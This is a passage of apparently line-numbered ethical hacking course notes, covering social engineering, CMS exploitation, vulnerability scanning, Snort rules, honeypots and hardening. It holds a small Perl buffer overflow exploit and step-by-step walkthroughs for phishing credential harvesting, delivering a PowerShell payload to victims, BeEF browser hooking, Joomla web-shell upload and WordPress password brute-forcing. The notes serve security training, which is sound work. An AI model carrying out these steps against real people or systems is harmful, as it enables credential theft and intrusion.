47611e66186a8e7f4a61ebaae3f46ae29b7520970ee1d605a28b3f55fe440002e44dd919a774edde630a8eed58831cd0004cea5b3b7f4ed9c2b45b39e62b258d87ba
4762
4763Calculate the number of bytes which is being transmitted before the patter we received.
4764There are 28 bits.... after 28 bites EIP can be overwrite.
4765
4766
4767
47681e66186a8e7f4a61ebaae3f46ae29b75
4769
4770
4771
4772Perl Exploit Code :
4773
4774
4775#!/usr/bin/perl
4776my $junkdata ="\x41"x28; #28 bits of data junk data
4777my $ret="\x16\x13\x40\x00"; #address where my exploit is
4778my $exploit=$junkdata.$ret; # combining two data
4779print "Sending Exploit......\n\n";
4780system("Lovely.exe",$exploit);
4781print "\n Done with akku..... Buffer OverFlow Successfull\n";
4782
4783----------------------------------------------
4784
4785
4786
4787 SESSION 11
4788 ==========
4789
4790SOCIAL ENGINEERING TOOLKIT (SET)
4791================================
4792The Social Engineering Toolkit (SET) is an automated python based toolkit, specifically designed to perform advanced attacks against the human elements and is pre-installed in Kali Linux. It is very easy to use and deploy some Social Engineering Attacks, if as layman has some knowledge of Kali Linux and SET, they can use it very easily. A user just have to enter the numbers, IP Addresses, domain names etc etc just for exploiting the entities.
4793
4794WALKTHROUGH STEPS
4795=================
4796
4797= Opening up Kali Linux, make sure VMmachine is in Bridged Mode.
4798= In the Terminal type > "setoolkit"
4799= This will show you options like these :
4800 The Social-Engineer Toolkit is a product of TrustedSec.
4801 Select from the menu:
4802
4803 1) Social-Engineering Attacks
4804 2) Penetration Testing (Fast-Track)
4805 3) Third Party Modules
4806 4) Update the Social-Engineer Toolkit
4807 5) Update SET configuration
4808 6) Help, Credits, and About
4809
4810 99) Exit the Social-Engineer Toolkit
4811
4812
4813ATTACK VECTORS
4814==============
48151. Going through Web Attacks
4816 = By pressing 1 for "Social-Engineering Attacks" we will get :
4817 Select from the menu:
4818
4819 1) Spear-Phishing Attack Vectors
4820 2) Website Attack Vectors
4821 3) Infectious Media Generator
4822 4) Create a Payload and Listener
4823 5) Mass Mailer Attack
4824 6) Arduino-Based Attack Vector
4825 7) Wireless Access Point Attack Vector
4826 8) QRCode Generator Attack Vector
4827 9) Powershell Attack Vectors
4828 10) SMS Spoofing Attack Vector
4829 11) Third Party Modules
4830
4831 99) Return back to the main menu.
4832
4833 = Going for "2) Website Attack Vectors" :
4834
4835 1) Java Applet Attack Method
4836 2) Metasploit Browser Exploit Method
4837 3) Credential Harvester Attack Method
4838 4) Tabnabbing Attack Method
4839 5) Web Jacking Attack Method
4840 6) Multi-Attack Web Method
4841 7) Full Screen Attack Method
4842 8) HTA Attack Method
4843
4844 99) Return to Main Menu
4845
4846 = Going with Credential Harvester Attack which uses Advanced Phishing Techniques :
4847 1) Web Templates
4848 2) Site Cloner
4849 3) Custom Import
4850
4851 99) Return to Webattack Menu
4852
4853 = In this either we can go for 2) Site Cloner OR 3) Custom Import, Entering Web Site Path, IP Address to run the Harvestor, and getting the Data.
4854
4855
48562. Mass Mailer Attack
4857 = SElecting from 1) Social Engineering Attacks, the next is 5) Mass Mailer Attack.
4858 = Select 2) Email Mass Mailer Attack
4859 = Create a Mail lists on the Attacker's Machine.
4860 = Give the path of the Mail List
4861 = Select a Gmail account and enter the details.
4862 = Add further details of the Dependencies for Mass Mailer Attack
4863 = Use ^C for sending the mails.
4864
48653. Powershell Attack Vectors
4866 = SElecting from 1) Social Engineering Attacks, the next is 9) Powershell Attack Vectors.
4867 = Selecting 1) Powershell Alphanumeric Shellcode Injector
4868 = Enter LHOST and LPORT
4869 = Go to the path where the Powershell Exploit File is saved, which is : "/root/.set/reports/powershell/"
4870 = Copy the text file, and save it to Desktop.
4871 = Change the extension from .txt to .bat .
4872 = Share the .bat file to the Victim's PC.
4873 = Run the listener on Attacking Machine.
4874 = Run the powershell.bat PAYLOAD file.
4875 = Get the Meterpreter Session.
4876
48774. Spear Phishing
4878 = SElecting from 1) Social Engineering Attacks, the next is 1) Spear-Phishing Attack Vectors.
4879 = Select 2) Create a FileFormat Payload.
4880 = Select a Payload.
4881 = Enter the requirements of sending spear phishing mails.
4882 = Trigger the Victim.
4883
4884
4885
4886
4887
4888BEEF FRAMEWORK
4889===============
4890
4891BEEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser. BEEF is in-built in Kali Linux, and it can be started as a service and can be accessed via a web browser on your localhost machine. We can easily hook a particular Victim through BEEF.
4892
4893STARTING UP BEEF FRAMEWORK
4894===========================
4895= Applications > Search BEEF > Click on "BEEF Start"
4896= It automatically runs and open up in the Browser using localhost IP Address and Port Number 3000.
4897 http://127.0.0.1:3000/ui/panel
4898= First it will be opening up a Authentication Page with the URL. The default credentials are beef:beef .
4899 http://localhost:3000/ui/authentication
4900
4901= Now we have to trigger the Victim to open the IP of the attacker where BEEF is running and then further exploiting through the framework after hooking.
4902
4903= It will be showing the Victim's IP in the Online Browser, further when selecting the Victim, we can navigate through "Commands" section for further Exploitation.
4904
4905
4906= Add this on the Victim's Browser : http://lhost:3000/demos/butcher/index.html
4907
4908TIP : For making it open in victim's browser, use QR Code attack from SET :)
4909
4910
4911
4912 SESSION 12
4913 ==========
4914
4915INTRODUCTION TO NESSUS
4916======================
4917
4918Nessus is one of the most popular and capable vulnerability scanners, it is an open-source network vulnerability scanner that uses the Common Vulnerabilities and Exposures architecture regarding all the CVE's , CWE's , CVSS Scores, NVT - Network Vulnerability Test Numbers and other architectures regarding all the Network Attacks. Nessus is a proprietary vulnerability scanner developed by Tenable Network Security. We will be covering up the installation, configuration steps, creating policies and maintainmg controls, starting a scan, and analyzing the reports using NESSUS Vulnerability Scanner.
4919It now costs $2,190 per year, which still beats many of its competitors. A free “Nessus Home” version is also available, though it is limited and only licensed for home network use. Nessus is constantly updated, with more than 70,000 plugins.
4920
4921
4922
4923How it works?
4924Nessus works by testing each port on a computer, determining what service it is running, and then testing this service to make sure there are no vulnerabilities in it that could be used by a hacker to carry out a malicious attack.
4925
4926
4927
4928
4929Nessus Plugins :
4930These programs are named plugins and are written in the Nessus Attack Scripting Language (NASL). The plugins contain vulnerability information, a simplified set of remediation actions and the algorithm to test for the presence of the security issue.
4931
4932
4933INSTALLAION AND CONFIGURATION
4934=============================
4935
4936= Downloading the Nessus home feed (free) or professional feed from the following link:
4937http://www.tenable.com/products/nessus/
4938
4939= Once you download the Nessus tool, you need to register with the Nessus official website to generate the activation key, which is required to use the Nessus tool. You can do it from the following link:(http://www.tenable.com/products/nessus/nessus-plugins/obtain-an-activation-code)
4940
4941= Click on “Nessus for Home” and enter the required details. An e-mail with an activation key will be sent to your mail.
4942
4943= Install the tool. (Installation of the Nessus tool will be quite confusing, so tutorials should be useful).For installation guidelines go to: (http://static.tenable.com/documentation/nessus_5.0_installation_guide.pdf).
4944
4945= Check for your operating system and follow the steps mentioned in the PDF.
4946Open Nessus in the browser; normally it runs on port 8834. The URL will be like : (http://localhost:8834/WelcomeToNessus-Install/welcome).
4947
4948= Create an account with Nessus. Entering the activation code you have obtained by registering with the Nessus website. Also you can configure the proxy if needed by giving proxy hostname, proxy username, and password.
4949
4950= Then the scanner gets registered with Tenable and creates a user.
4951
4952= Download the necessary plug-in. (It takes some time to download the plug-in; while you are watching the screen, you can go through the vast list of resources we have for Nessus users).
4953
4954= Once the plug-ins are downloaded, it will automatically redirect you to a login screen. Provide the username and password that you have created earlier to login.
4955
4956dpkg -i nesus.deb
4957follow the instructions terminal.
4958/etc/init.d/nessusd start > start
4959https://username:8834
4960
4961
4962----------------------------------------------------------
4963
4964
4965Key Features
4966=============
4967= Identifies vulnerabilities that allow a remote attacker to access sensitive information from the system.
4968= Checks whether the systems in the network have the latest software patches
4969= Tries with default passwords, common passwords, on systems account
4970= Configuration audits
4971= Vulnerability analysis
4972= Mobile device audits - BYOD
4973= Customized reporting
4974= For more details on the features of Nessus, visit: http://www.tenable.com/products/nessus/nessus-product-overview/nessus-features.
4975
4976
4977NESSUS SCANS
4978============
4979
4980Host Discovery : This can will let us know about all the connected nodes or devices in the same network. Hence in blackbox testing it wil be very useful to know how many machines are there in scope to test.
4981
4982Basic Scan : Basic scan will give you details which are not dat in detail but they are enough you understand the basic security architeure of the device on which we are doing the scan.
4983
4984Advance Scan : Includes dynamic approach with custom policy and rules to scan on the target. Hence we can proceed with any cutomized scan on any deviceto get a desired result report based on our selected parameters. In this advance scan we can actualy input what to do and what to skip options too hence it will increase the scan speed along with the productivity by giving attention to only policies which are critical than the policies which are not buiness critical.
4985
4986Audit Cloud Instrastructure : Cloud based CMS and other buiness applications can be audit from Nessus.
4987
4988Internal PCI Network Scan : PCI DSS scan is a global payment gateway audit having controls to check the overall security of the implemented project to process the transactions internaly or externely for the organisation.
4989
4990Malware Scan : MDM(Mobile Device Management) Config Audit : MDM is implemented when companies using BYOD policy in the organisation.
4991
4992Including other scans like : Mobile Device Scan, Offline Config, Audit PCI Quarterly External Scan , Polciy Complaince Auditing, SCAP and OVAL Auditing, Web Application Tests etc. with other protection.
4993
4994
4995RUNNING NESSUS
4996===============
4997
4998Nessus gives you lots of choices when it comes to running the actual vulnerability scan. You’ll be able to scan individual computers, ranges of IP addresses, or complete subnets. There are over 1200 vulnerability plug-ins with Nessus, which allow you to specify an individual vulnerability or a set of vulnerabilities to test for. In contrast to other tools, Nessus won’t assume that explicit services run on common ports; instead, it will try to exploit the vulnerabilities.
4999
5000
5001PRACTICALS :
5002===========
5003Scanning the networks through :
5004
5005= Host Discovery
5006= Basic Scan
5007= Advanced Scan
5008
5009
5010
5011 SESSION 13
5012 ==========
5013
5014CMS
5015====
5016
5017Content Management System
5018=========================
5019For creating a whole new website, you just need to drag and drop the site's element only. You do not need to have very awesome knowledge of HTML, JS, PHP, SQL and all.. So you are just required to have a good knowledge of english and grammer.
5020
5021WordPress also provides the CMS
5022================================
5023
5024How to recognise the site is in wordpress :
5025
50261. Wappalyzer
50272. Add wp-admin or wp-login in the end of thr url = inurl : wp-login OR inurl : wp-admin
50283. We will see "wp-content", when we look up for the image location
50294. Using whatweb to analyze the routing and complete information of a Web Server.
5030
5031Download Wordpress - www.wordpress.org - 4.8
5032
5033http://127.0.0.1/wordpress/wp-content/uploads/2017/11/bharat-210x300.jpg
5034
5035Hacking into wordpress website
5036===============================
5037
5038wpscan > Inbuild tool for kali linux. Used for enumerating and scanning the Wordpress Website.
5039
5040#wpscan
5041
5042#wpscan --url 127.0.0.1/wordpress
5043
5044#wpscan --url 127.0.0.1/wordpress --enumerate t (To enumerate the data about the theme)
5045
5046#wpscan --url 127.0.0.1/wordpress --enumerate p (To enumerate the data about plugins)
5047
5048#wpscan --url 127.0.0.1/wordpress --enumerate ap (To enumerate the data about ALL plugins)
5049
5050#wpscan --url 127.0.0.1/wordpress --enumerate vp (To enumerate the data about Vulnerable plugins)
5051
5052#wpscan --url 127.0.0.1/wordpress --enumerate at (To enumerate the data about the all themes)
5053
5054#wpscan --url 127.0.0.1/wordpress --enumerate vt (To enumerate the data about the vulnerbale themes)
5055
5056#wpscan --url 127.0.0.1/wordpress --enumerate u (To enumerate the data about username)
5057
5058#wpscan --url 127.0.0.1/wordpress -U elliot -P /usr/share/wordlists/rockyou.txt ( For bruteforcing the password)
5059
5060
5061-----------------------------------------------------------------------------------------------------------
5062
5063REMEDIES :
5064==========
5065
5066= wp-login changer : It will change wp-admin / wp-login to another directory name for example. wp-admin changed to adminlogin.php
5067= Login Limiter : Set the number of login attempts into the login page. (It's a plugin in login page.)
5068
5069
5070-----------------------------------------------------------------------------------------------------------
5071
5072
5073
5074
5075OPENVAS (REMOVED FROM COURSE CONTENT CAUSE OF UNAVAILIBILITY)
5076
5077The OpenVAS (Open Vulnerability Assessment System) scanner is a comprehensive vulnerability assessment system that can detect security issues in all manner of servers and network devices. OpenVAS is updated through the Network Vulnerability Tests (NVTs) feed. It is pre-installed in Kali 2.0 (2016) version. It uses Greenbone Security Assessment as the Control Authority of it. It is also listed in the best Network Scanning Report Generation tools.
5078
5079Scan Types :
5080
5081= Full Scan for a full test of network, server and web application vulnerabilities.
5082
5083= Web Server Scan a more focused test for web server and web application vulnerabilities.
5084
5085= WordPress Scan testing for known WordPress vulnerabilities and web server issues.
5086
5087= Joomla Scan testing for known Joomla vulnerabilities and web server issues.
5088
5089
5090Running OpenVAS
5091===============
5092
5093Requirements : Kali 2.0 (2016.1) , Iceweasel Browser, OpenVAS
5094
5095
5096
5097 SESSION 14
5098 ==========
5099
5100What Is a CMS?
5101================
5102
5103A Content MAnagement System(CMS), is a system that allows you to manage information easily and effectively. The information could be anything, whether it’s a simple article or a complex media management system.
5104It’s for non-technical users based system that allows them organize content easily and makes the process easily rather than hectic. In any web-based application, there are three basic operations
5105--> Add
5106--> Edit
5107--> Delete
5108
5109Example: Wordpress , Joomla , drupal etc...
5110
5111
5112Joomla
5113=========
5114Joomla is an open source CMS that allows you to generate web content and powerful applications.
5115
5116
5117Wordpress and Joomla
5118---------------------
5119WordPress is now a multi-purpose content management system that powers over 31% of all the websites on the Internet (including a lot more than just blogs!).
5120
5121Joomla is the second most popular content management system, powering around 3% of all the websites on the Internet.
5122
5123
5124---> Functionality – WordPress calls these plugins, while Joomla calls them extensions.
5125
5126---> Aesthetics – WordPress calls these themes, while Joomla calls them templates.
5127
5128
5129Installation Of Joomla (Setting Up of Joomla)
5130=========================
5131Step 1: visit https://downloads.joomla.org/cms/joomla3/3-7-1
5132Step 2: Download and extract it.
5133Step 3: Now copy the folder to c://xampp/htdocs
5134Step 4: Open it in browser
5135Step 5: Fill the details in first tab and click Next.
5136Step 6: Create a database for joomla.
5137Step 7: Add a User and assign Priveleges.
5138Step 8: Now go to C:\xampp\htdocs\Joomla\installation\sql\mysql
5139Step 9: Open Joomla.sql
5140Step 10: Change ENGINE=InnoDB to ENGINE=MyIsam
5141Step 11: save it then click on next option of Next page
5142Step 12: Click on Install
5143Step 13: Remove the installation folder other next time it will open the same setup
5144Step 14: We get two interfaces one is of the index page or front page visible to users and the next is your admin panel
5145step 15: visit both of them and later on login to the Admin page then go to Extensions ---> templates ---> protostar ----> open details of theis template
5146Step 16: visit index.php
5147Step 17: open KALI and create a payload and save it in file and start listening
5148Step 18: copy the uploading script available at: https://github.com/ t3rabyt3/Gravy-Uploader
5149Step 19: paste it in the index.php i.e. replace the actual code with this
5150Step 20: refresh the user page
5151Step 21: we get the uploading option available and then we will upload the script created in Step 17.
5152Step 22: Now just open the file(malicious php code along which payload is embeded) present in the server to run your script
5153Stp 23:we run the script and on the other side we got the meterpreter session.
5154Step 24: ENJOY ... :)
5155
5156
5157Exploiting Joomla
5158==================
5159
5160Tools in use :
5161- Joomscan
5162- Dirb
5163- Nikto
5164- Uniscan
5165
5166Joomscan : Tool created by OWASP for doing the fingerprinting of all the Joomla Websites.
5167 Usage : joomscan --url "TargetUrl"
5168 joomscan --url "TargetUrl" -ec
5169
5170DIRB - Directory Bruteforce tool for sub directories of a domain.
5171 Usage : dirb targeturl
5172
5173NIKTO - Vulnerability Assessment tool for Websites.
5174 Usage : nikto -h TargetUrl
5175
5176Uniscan - All in one tool for a Web Application.
5177 Usage : uniscan -u targeturl -qweds
5178
5179
5180
5181 SESSION 15
5182 ==========
5183
5184WIRESHARK
5185==========
5186
5187Wireshark is a free application that allows you to capture and view the data traveling back and forth on your network, providing the ability to drill down and read the contents of each packet – filtered to meet your specific needs.
5188
5189This open-source protocol analyzer.
5190
5191Originally known as Ethereal, Wireshark features a user-friendly interface that can display data from hundreds of different protocols on all major network types.
5192
5193-----------------------------------------------------------------------------
5194
5195Winpcap : Windows Packet Capturing Manager
5196USBpcap : USB extension for saving .cap file to usb drives.
5197
5198------------------------------------------------------------------------------
5199
5200Download : https://www.wireshark.org/download.html
5201
5202
5203Packet List :
5204==============
5205
5206Time: The timestamp of when the packet was captured is displayed in this column.
5207
5208Source: This column contains the address (IP or other) where the packet originated.
5209
5210Destination: This column contains the address that the packet is being sent to.
5211
5212Protocol: The packet's protocol name (i.e., TCP) can be found in this column.
5213
5214Length: The packet length, in bytes, is displayed in this column.
5215
5216Info: Additional details about the packet are presented here. The contents of this column can vary greatly depending on packet contents.
5217
5218
5219
5220Filters:
5221========
5222
5223Filtering on the basis of IP
5224
5225= ip.addr == IPADDRESS
5226
5227For Filtering particular "source"
52281. ip.src == 192.168.43.43
5229
5230For Filtering particular "protocol"
52312. dns
5232
5233Using multiple Filters
52343. dns && ip.src == 192.168.43.1
5235
5236Filtering particular Destination
52374. ip.dst == 192.168.43.43
5238
5239Filtering Multiple Sources (Both Condition should be True)
52405. ip.src == 192.168.43.43 && ip.src == 192.168.43.1
5241
5242Filtering Multiple Sources (Any Condition should be True)
52436. ip.src == 192.168.43.43 || ip.src == 192.168.43.1
5244
5245Either this address in source or destination
52467. ip.addr == 192.168.43.43
5247
5248Not Condition (Dont want to view this source)
52498. !(ip.src == 192.168.43.43)
5250
5251Mutiple filters and both should be true as this is having &&
52529. ip.src == 192.168.43.43 && !(ip.dst == 192.168.43.1)
5253
5254For filtering packets on basis of data it contains
525510. tcp contains demo.testfire.net
5256
5257For filtering pckets contains password
525811. http.request.method == "POST"
5259
5260
5261----------------------------------------------------------------------------
5262
5263
5264
5265 SESSION 16
5266 ===========
5267
5268Introduction to IDS | IPS | Honeypots
5269Network Security With Snort
5270Log Analysis
5271Honeypots and Attack Analysis
5272
5273
5274SECURITY MITIGATIONS PRODUCT
5275=============================
5276
52771. POINT PRODUCT
5278 - FIREWALL
5279 - WAF
5280 - IDS
5281 - IPS
5282 - ANTIMALWARES
5283 - DMZ
5284 - HONEYPOTS
5285
52862. CONSOLIDATED PRODUCTS
5287 - UTM (UNIFIED THREAT MANAGEMENT SYSTEM)
5288
5289
5290IDS --> Intrusion Detection System|Servcies
5291===========================================
5292 It is the service which helps in detecting in any kind of intrusion and malicious activity of teh attacker in the network.
5293IPS --> Intrusion Prevention System|Servcies
5294============================================
5295 After, once the intrusion is detected, there comes the prevention phase. In this phase, the application or the software will tell you that these are the ways in which you can prevent your system from being intruded or from being compromised.
5296
5297IDS and IPS are known as the anti virus of the network --> They work on the network level.
5298
5299They work on the content of the packet which are transmitted in the network.
5300 Destination Port
5301 Source Port
5302 Services
5303 Data
5304 Signarute
5305 Source IP Address
5306 Destination IP Address
5307
5308SNORT --> It is considered to be the world's best IDS and IPS used by teh corporates.
5309It works on the rule basis of the data and the packets.
5310
5311For Installing SNORT
5312====================
5313 #apt-get install snort
5314For Checking the SNORT Version
5315==============================
5316 #snort -V
5317For Starting SNORT
5318==================
5319 #snort
5320
5321Rule Files
5322==========
5323 /etc/snort/rules --> where all the rules are located, of snort.
5324
5325PREDIFINED RULES
5326
5327alert tcp $EXTERNAL_NET any -> $HOME_NET 79 (msg:"FINGER null request"; flow:to_server,established; content:"|00|"; reference:arachnids,377; classtype:attempted-recon; sid:324; rev:5;)
5328
5329alert tcp $EXTERNAL_NET any -> $HOME_NET 21
5330(msg:"FTP MDTM overflow attempt"; flow:to_server,established; content:"MDTM"; nocase; isdataat:100,relative; pcre:"/^MDTM\s[^\n]{100}/smi"; reference:bugtraq,9751; reference:cve,2001-1021; reference:cve,2004-0330; reference:nessus,12080; classtype:attempted-admin; sid:2546; rev:5;)
5331
5332Format For Creating Snort Rules
5333===============================
5334Basic Rule Syntax
5335-----------------
5336 Action Protocol SourceIPAddress SourcePortNumber DirectionOfFlow DestinationIPAddress DestinationPortNuber (Body;)
5337
5338alert tcp any any -> any any (msg:"Sample Alert";)
5339
5340The Rule Header
5341---------------
5342 Action (log, Alert)
5343 Protocol (TCP, UDP, IP, ICMP, any)
5344 Source IP Address --> From where Data is originated
5345 Source Port Number --> Port Number of the source Device
5346 Direction Operator --> ("->" - Unidertional, "<>" - bidirectional)
5347
5348 <>
5349
5350 Destination IP Address --> To which IP Address data is going
5351 Destination Port Number --> To which port session is creating
5352
5353Source and Destination IP Address can be variables
5354==================================================
5355 1. $EXTERNAL_NET --> Any IP Address which is an external IP Address, outside the organisation.
5356 2. $HOME_NET --> Any IP Address from the inernal organisation or the intranet.
5357
5358Source IP Address
5359=================
53601. If I want to make it specific --> instead of any, i want to give an IP Address
5361 alert any 192.168.0.10 any -> $HOME_NET any (msg:"Vallari Mittal Is Again Attacking";)
5362
53632. If I want the source IP Address for Intranet
5364 alert any $HOME_NET any -> any any (body;)
5365
53663. If I want the source IP Address for Internet
5367 alert any $EXTERNAL_NET any -> any any (body;)
5368
5369Same Thing Goes With Destination IP Address.
5370
5371alert any any any <> any any (content:"www.facebook.com";msg:"FACEBOOK ALERT KINDLY SEE")
5372
5373
5374alert tcp any 22 <> 192.168.0.14 22 (msg; SSH ATTACK DETECTED)
5375
5376We will create these rules and save them in /etc/snort/rules.
5377 imma.rules ---> rule file
5378But we havenot implemented those rules.
5379For Implementing we need to edit a configuration file of snort.
5380 /etc/snort/
5381 /etc/snort/snort.conf
5382
5383Types Of Rule Options
5384=====================
5385There are 5 types of rule Options
5386 1. Metadata
5387 2. Payload Data
5388 3. Non Payload Data
5389 4. Post Detection
5390 5. Thresholding and suppression
5391
5392Honeypots
5393=========
5394 It is a system designed to appear vulnerable to attackers. The goal of a Honeypot is to log all the attacker's activity to study their behavious, log their IP Addresses, Track their locations and collect the data about 0-day exploits. The idea of Honeypot is nothing but a server that offers any kind of services to the attackers, from ssh to telnet, showing various well known exploitable ports.
5395
5396Pentbox --> HoneyPot for Linux/unix based OS.
5397Download .tar.gz file from sourceforge.net
5398Open the terminal
5399 #cd Downloads
5400 #tar vzxf Filename.tar.gz
5401 #cd pentbox-1.0
5402 #./pentbox.rb
5403
5404
5405
5406UTM
5407===
5408UTM stands for Unified THreat Management System is a promising technology having Firewalls, Antiviruses, IDS, IPS, Web SEcurity, Wireless Security, Service Enumeration etc.
5409Unified threat management (UTM) is a promising approach to consolidating security controls, including Firewalls, Intrusion Prevention System (IPS), Intrusion Detection System (IDS), Anti-Malware, Content Filtering, Web Filtering, Logging and Reporting. There are, however, a number of operational issues that should be considered when evaluating and managing these devices.
5410
5411
5412Eg. Sophos UTM 9.
5413
5414Registeration of Demo Sophos UTM 9 - https://secure2.sophos.com/en-us/products/unified-threat-management/demo.aspx
5415
5416
5417https://utm.trysophos.com/
5418
5419
5420--------
5421
5422
5423Log Analysis
5424============
5425Syntax of Log Of A Server
5426-------------------------
5427
5428IP Address | Remote Log Name | Authentication Type | TimeStamp | Access Request | Response Code | Data Transfer (Bytes) | Referrer URL | User Agent
5429
5430
5431
5432IP Address -> 127.0.0.1 --> IP Address of the visitor
5433Remote Log Name --> Identity Check for browser '-'
5434
5435Authentication --> 1. Basic Authentication
5436 2. Integrated Authentication
5437 3. Form Based Authentication
5438 4. Digest Authentication
5439
5440
5441Response Code --> 5 type of responses code
5442 1xx --> Informational resource
5443 2xx --> Successful redirection
5444 3xx --> Redirection
5445 4xx --> Client Side error
5446 5xx --> Server Side error
5447
5448Eg.
5449192.168.195.156 - - [27/Mar/2018:19:38:38 +0530] "GET /icons/back.gif HTTP/1.1" 200 216 "http://192.168.195.156/test/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:59.0) Gecko/20100101 Firefox/59.0"
5450
5451
5452---------------------
5453
5454
5455
5456 SESSION 17
5457 ==========
5458
5459INTRODUCTION TO SYSTEM HARDENING
5460================================
5461
5462System hardening is a auditing process in which we try to scan and check each and every aspect of security from settings to updated versions of system softwares which may or may not lead to a system compromisation.
5463To reduce the surface of vulnerability.
5464
5465Windows: Critical Systems with OS (Servers 2008 onwards)
5466Windows: Non Critical Systems with OS (Simple OS inhouse computers)
5467Windows: Hardware Devices in scope (CCTV Camera with Windows Mobile OS inside it etc.)
5468
5469System Hardening is a very critical audit process in which every aspect of security is being considered to be a serious issue, majority of the comapnies are maintaining the system security with AD control framework. Hence no one audit a single pc manualy which is the gap which we fullfil as an auditor on the client site.
5470
5471Sample Checklist of Windows 7 : Control List
5472
5473 Good Firewall > Inbound and Outbound Rules.
5474 Antivirus
5475 Disable Autorun
5476 Disable USB
5477 Never download or surf on unknown source
5478
5479msconfig.msc
5480secpol.msc
5481gpedit.msc
5482regedit.exe
5483
5484
5485- Setting SEcurity Policies using secpol.msc and gpedit.msc
5486- Banning malicious hamful extensions such as (.bat) for Windows using regedit.exe
5487- Checking Startup and Persistence Process using msconfig.msc
5488
5489
5490ISO 27001 Compliance - Bible for system auditing and system hardening(ISMS - INFORMATION SECURITY MANAGEMENT SYSTEM)
5491In the whole ISO series, ISO 27001 and 27002 is considered to be the most widely and bestly used compliance.
5492 CSO
5493 CISO
5494 Lead Auditors
5495
5496- Perimeter Security : Perimeter security refers to natural barriers or built fortifications to either keep intruders out or to keep captives contained within the area the boundary surrounds.
5497
5498Basic Security Configurations : Checking the outdated softwares in the environment, checking the old hardware having old firmware application running, applications running with vulnerable version. etc.
5499
5500Automated Security Analyzers
5501-> Script (For Example: Sub Domain Finder : GITHub)
5502-> nmap
5503-> SPARTA
5504
5505Linux Based System Hardening
5506----------------------------
5507- Lynis
5508
5509Lynis - Security auditing and hardening tool, for UNIX-based systems.
5510Lynis is a security auditing for UNIX derivatives like Linux, macOS, BSD, and others. It performs an in-depth security scan and runs on the system itself. The primary goal is to test security defenses and provide tips for further system hardening. It will also scan for general system information, vulnerable software packages, and possible configuration issues. Lynis was commonly used by people in the "blue team" to assess the security defenses of their systems. Nowadays, penetration testers also have Lynis in their toolkit.
5511
5512Goals
5513======
5514The main goals are:
5515--------------------
5516 Automated security auditing
5517 Compliance testing (e.g. ISO27001, PCI-DSS, HIPAA)
5518 Vulnerability detection
5519
5520The software (also) assists with:
5521---------------------------------
5522 Configuration management
5523 Software patch management
5524 System hardening
5525 Penetration testing
5526 Intrusion detection
5527
5528
5529Typical users of the software:
5530------------------------------
5531 System administrators
5532 Auditors
5533 Security officers
5534 Security professionals
5535
5536Installation
5537============
5538Git
5539Clone or download the project files (no compilation nor installation is required) ;
5540
5541 git clone https://github.com/CISOfy/lynis
5542Execute:
5543
5544 ./lynis audit system
5545
5546
5547--------------------------------------------------------------------------
5548
5549
5550Bash Scripting
5551==============
5552
5553Creating a tool like Netdiscover which shows active hosts in a network.
5554
5555File name : searchip.sh
5556
5557- ping 192.168.0.1, ping 192.168.0.2 etc
5558- ping -c 1 192.168.0.1, ping -c 1 192.168.0.2 etc
5559- ping -c 1 192.168.0.1 | grep "64 bytes", ping -c 1 192.168.0.2 | grep "64 bytes" etc.
5560- ping -c 1 192.168.0.1 | grep "64 bytes" | cut -d " " -f4, ping -c 1 192.168.0.2 | grep "64 bytes" | cut -d " " -f4 etc.
5561- ping -c 1 192.168.0.1 | grep "64 bytes" | cut -d " " -f4 | cut -d ":" -f1 , ping -c 1 192.168.0.2 | grep "64 bytes" | cut -d " " -f4 | cut -d ":" -f1 etc.
5562
5563- Looping statement
5564 for i in $(seq 1 255);
5565 do
5566 ping -c 1 192.168.0.$i | grep "64 bytes" | cut -d " " -f4 | cut -d ":" -f1
5567 done
5568
5569------------------------------------------------------------------------------------
5570
5571
5572
5573 SESSION 18
5574 ==========
5575
5576INTRODUCTION TO PENETRATION TESTING
5577-----------------------------------
5578Its a post info gathering phase in which we exploit the vulnerabilities discovered in the VA phase.
5579WEB PT
5580NETWORK PT
5581MOBILE PT - Mobile SF Framework .apk .ipa
5582Documentation : Digital Security Report
5583
5584
5585
5586
5587Ethics of Penetration Tester
5588----------------------------
55891. Nothing out of the box in scope
55902. You are a hacker not a hero
55913. Documentation is for developers not for CEO so make sense.
55924. Read the code of conduct and make sure you will not anything which beyond our scope.
5593
5594
5595
5596
5597Penetration Testing Methodlogies
5598--------------------------------
55991. Web Based Pen Testing : Scope + Info Gather + Exploit + Report of remedations +
5600Applying the patch through company team.
56012. Network and Mobile
56023. Process or Governence : Read the polcies,contracts,vendor agreements and so on + Find Loopholes in clauses + Report and Identify to high level management+ draft new polciy.
5603
5604iso 27001 Complaince : Read
5605
5606
5607
5608
5609Scope Analysis
5610---------------
5611Step 1: Query for VAPT
5612Step 2: Scoping document WEB/NETWORK/MOBILE
5613Step 3: Response Meeting
5614Step 4: Proposal with Price and MAN per day cost
5615Step 5: Acceptance and Date to start the project.
5616
5617
5618
5619Customer and Legal Agreements
5620-----------------------------
5621-> Code of Conduct Signing
5622-> NDA - non Disclosure Agreement
5623-> MOU - Momerendum Of Understand
5624
5625
5626Pen Testing Planning and Scheduling
5627-----------------------------------
5628Teams
5629
5630VA : Web , Network , Mobile , Complaince
5631
5632PT : Web , Network , Mobile , Complaince
5633
5634Date Start : 21st Jan 2016 of Jan 26th Jan 2016
5635
5636Total Number of Days : 6 Man Days
5637Green Zone : 2 3 Weeks 2 day : Sat Sunday
5638Night Shift : 8.00PM -> Monday 3AM Close 422 Servers
5639
5640Sr. Resource : RM RM--> Single point of contact for the client.
5641
5642
5643Pre Pen Testing Checklist
5644-------------------------
56451. License Requirements ????
56462. List of tools to be used in the testing
56473. Team Listing and Tracking
5648
5649
5650Types of Pen Testing
5651-> Internal : Network Pentesting and Internal Application Layer Pentesting inside which we try to audit and test all network assests of the organisation along with all in house web applications which runs on the network communication.
5652
5653-> External : Web Application Testing + Pen testing through a company VPN.
5654
5655
5656
5657-> White Box : White box testing, which is also known as clear box testing, refers to testing a system with full knowledge and access to all source code and architecture documents. Having full access to this information can reveal bugs and vulnerabilities more quickly than the "trial and error" method of black box testing.
5658 Scope is clear, what os is running on each machines, open port details, service pack details , kernal details, critical or non critical details, version of services details and so on, application source code visibility etc etc.
5659
5660-> Grey Box : When we talk about gray box testing, we're talking about testing a system while having at least some knowledge of the internals of a system. This knowledge is usually constrained to detailed design documents and architecture diagrams. It is a combination of both black and white box testing, and combines aspects of each.
5661 List of IP addresses in terms of network PT and Host name details thats all. In web subdomain names and thats all.
5662
